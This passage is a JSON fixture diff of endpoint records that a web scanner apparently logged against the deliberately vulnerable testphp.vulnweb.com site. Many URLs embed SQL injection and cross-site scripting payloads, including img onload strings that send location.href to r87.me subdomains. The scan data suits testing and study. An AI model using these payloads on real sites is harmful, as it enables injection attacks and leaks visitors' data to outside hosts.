"startScan.endpoint", + "pk": 1574, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/cgi-bin/1", + "content_length": 273, + "page_title": "404 Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:00.165Z", + "response_time": 0.357832245, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1575, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/cgi-bin/13/6/2020", + "content_length": 273, + "page_title": "404 Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:00.428Z", + "response_time": 0.33907386500000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1576, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/cgi-bin/13/6/20205", + "content_length": 273, + "page_title": "404 Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:00.730Z", + "response_time": 0.348808244, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1578, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/clientaccesspolicy.xml", + "content_length": 307, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:24:01.582Z", + "response_time": 0.342810628, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1581, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/comment.php?aid=%27%20UNION%20SELECT%20%2A%20FROM%20information_schema%20--", + "content_length": 1252, + "page_title": "comment on artist", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:01.880Z", + "response_time": 0.348183558, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1592, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/comment.php?pid=1", + "content_length": 1253, + "page_title": "comment on picture", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:03.225Z", + "response_time": 0.352447178, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1593, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/comment.php?pid=2", + "content_length": 1253, + "page_title": "comment on picture", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:05.866Z", + "response_time": 0.346752821, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1594, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/comment.php?pid=3", + "content_length": 1253, + "page_title": "comment on picture", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:05.989Z", + "response_time": 0.33894972100000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1595, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/comment.php?pid=3A01", + "content_length": 1253, + "page_title": "comment on picture", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:06.122Z", + "response_time": 0.361294737, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1596, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/comment.php?pid=4", + "content_length": 1253, + "page_title": "comment on picture", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:06.240Z", + "response_time": 0.343130223, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1597, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/comment.php?pid=5", + "content_length": 1253, + "page_title": "comment on picture", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:06.481Z", + "response_time": 0.35233568200000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1598, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/comment.php?pid=6", + "content_length": 1253, + "page_title": "comment on picture", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:06.839Z", + "response_time": 0.34267995100000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1599, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/comment.php?pid=7", + "content_length": 1253, + "page_title": "comment on picture", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:06.979Z", + "response_time": 0.33958573200000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1607, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/disclaimer.php", + "content_length": 5524, + "page_title": "disclaimer", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:11.848Z", + "response_time": 0.357446203, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1612, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/dot.gif", + "content_length": 43, + "page_title": null, + "http_status": 200, + "content_type": "image/gif", + "discovered_date": "2024-11-13T02:24:12.432Z", + "response_time": 0.36049711300000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1615, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/favicon.ico", + "content_length": 894, + "page_title": null, + "http_status": 200, + "content_type": "image/x-icon", + "discovered_date": "2024-11-13T02:24:12.745Z", + "response_time": 0.34754478299999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1617, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/guestbook.php", + "content_length": 5390, + "page_title": "guestbook", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:12.970Z", + "response_time": 0.35535099600000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1626, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp", + "content_length": 203, + "page_title": "HTTP Parameter Pollution Example", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:16.580Z", + "response_time": 0.356915871, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1629, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/?pp='%22--%3E%3C%2fst", + "content_length": 414, + "page_title": "HTTP Parameter Pollution Example", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:17.287Z", + "response_time": 0.34310648400000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1630, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/?pp='%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%25", + "content_length": 466, + "page_title": "HTTP Parameter Pollution Example", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:17.438Z", + "response_time": 0.352904577, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1631, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/?pp='%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%20src%3d%22%2f%2fmv9e8mbvffulk1i0duvujvkdkktmkntnztbb8kejrja%26%2346%3br87%26%2346%3bme%22%3E%3C%2fscRipt%3E", + "content_length": 745, + "page_title": "HTTP Parameter Pollution Example", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:17.980Z", + "response_time": 0.352085914, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1632, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/?pp=12", + "content_length": 383, + "page_title": "HTTP Parameter Pollution Example", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:18.135Z", + "response_time": 0.347720483, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1633, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/?pp=12A01", + "content_length": 392, + "page_title": "HTTP Parameter Pollution Example", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:19.764Z", + "response_time": 0.34062364500000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1634, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/?pp=12Connection:", + "content_length": 418, + "page_title": "HTTP Parameter Pollution Example", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:20.851Z", + "response_time": 0.33836168099999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1635, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/?pp=12User-Agent:", + "content_length": 418, + "page_title": "HTTP Parameter Pollution Example", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:21.125Z", + "response_time": 0.339335646, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1636, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/?pp=aaa%22bbb", + "content_length": 400, + "page_title": "HTTP Parameter Pollution Example", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:21.425Z", + "response_time": 0.348566407, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1637, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseove", + "content_length": 418, + "page_title": "HTTP Parameter Pollution Example", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:22.189Z", + "response_time": 0.33960717799999995, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1638, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dalert(0x106ED2", + "content_length": 470, + "page_title": "HTTP Parameter Pollution Example", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:22.309Z", + "response_time": 0.343103241, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1639, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dalert(0x106ED2)%20x%3d%22", + "content_length": 491, + "page_title": "HTTP Parameter Pollution Example", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:22.428Z", + "response_time": 0.35053247699999995, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1640, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x00333D", + "content_length": 485, + "page_title": "HTTP Parameter Pollution Example", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:22.549Z", + "response_time": 0.355796443, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1641, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x00333D)%20x%3d%22", + "content_length": 506, + "page_title": "HTTP Parameter Pollution Example", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:22.669Z", + "response_time": 0.34718767, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1642, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x106ED2", + "content_length": 485, + "page_title": "HTTP Parameter Pollution Example", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:22.788Z", + "response_time": 0.35452670999999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1647, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f&p=%25", + "content_length": 1, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:23.286Z", + "response_time": 0.360420442, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1648, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f&p=%3CscRipt%3Ealert(0x107E91", + "content_length": 22, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:23.403Z", + "response_time": 0.355768638, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1649, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f&p=%3CscRipt%3Enetsparker(0x0", + "content_length": 22, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:23.524Z", + "response_time": 0.34661513000000005, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1650, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f&p=%3CscRipt%3Ealert(0x107E91)%3C%2fscRipt%3E&pp=12", + "content_length": 34, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:23.645Z", + "response_time": 0.356829454, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1652, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f&p=%3CscRipt%3Enetsparker(0x004FC3)%3C%2fscRipt%3E&pp=12", + "content_length": 39, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:23.889Z", + "response_time": 0.339021244, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1653, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f&p=%3CscRipt%3Enetsparker(0x1", + "content_length": 22, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:26.584Z", + "response_time": 0.356709445, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1655, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f&p=N3tSp4rK3R&pp=12", + "content_length": 12, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:26.830Z", + "response_time": 0.35152664600000005, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1656, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f&p=val", + "content_length": 3, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:26.949Z", + "response_time": 0.356197259, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1657, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f&p=valid&pp=%3CiMg%20src%253", + "content_length": 15, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:27.192Z", + "response_time": 0.352813191, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1658, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f&p=valid&pp=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d''%3bthis.src%3d'%2f%2fmv9e8mbvfflt-5t3c4td9zm1_axokh_ruxslkabx'%2b'ww4.r87.me%2fr%2f%3f'%2blocation.href%22%3E", + "content_length": 147, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:27.527Z", + "response_time": 0.34426963699999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1659, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f&p=valid&pp=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d''%3bthis.src%3d'%2f%2fmv9e8mbvfflt-5t3c4td9zm1_axokh_ruxslkabx'%2b'ww4.r87.me%2fr%2f%3f'%2blocation.href%22%3ECONFIRMED", + "content_length": 156, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:27.650Z", + "response_time": 0.35535747500000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1661, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f&p=valid&pp=%3CscRipt%3Ealert(0x107FBD)%3C%2fscRipt%253", + "content_length": 38, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:28.329Z", + "response_time": 0.346799959, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1662, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f&p=valid&pp=%3CscRipt%3Ealert(0x107FBD)%3C%2fscRipt%3E", + "content_length": 37, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:28.487Z", + "response_time": 0.352558733, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1663, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f&p=valid&pp=%3CscRipt%3Enets", + "content_length": 17, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:30.110Z", + "response_time": 0.34456572399999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1664, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f&p=valid&pp=%3CscRipt%3Enetsparker(0x005036", + "content_length": 32, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:31.196Z", + "response_time": 0.34481805000000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1665, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f&p=valid&pp=%3CscRipt%3Enetsparker(0x005036)%3C%2fscRipt%3E", + "content_length": 42, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:31.481Z", + "response_time": 0.354609757, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1666, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f&p=valid&pp=%3CscRipt%3Enetsparker(0x107FBD", + "content_length": 32, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:31.779Z", + "response_time": 0.352422744, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1668, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=3&p=%3CiMg%20src%3d%22%252", + "content_length": 12, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:32.662Z", + "response_time": 0.342184006, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1669, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=3&p=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d''%3bthis.src%3d'%2f%2fmv9e8mbvffdujmqnumt1bjkxifmvoyfr6vtb3zin'%2b'jak.r87.me%2fr%2f%3f'%2blocation.href%22%3E&pp=12", + "content_length": 144, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:32.780Z", + "response_time": 0.352487229, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1670, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": 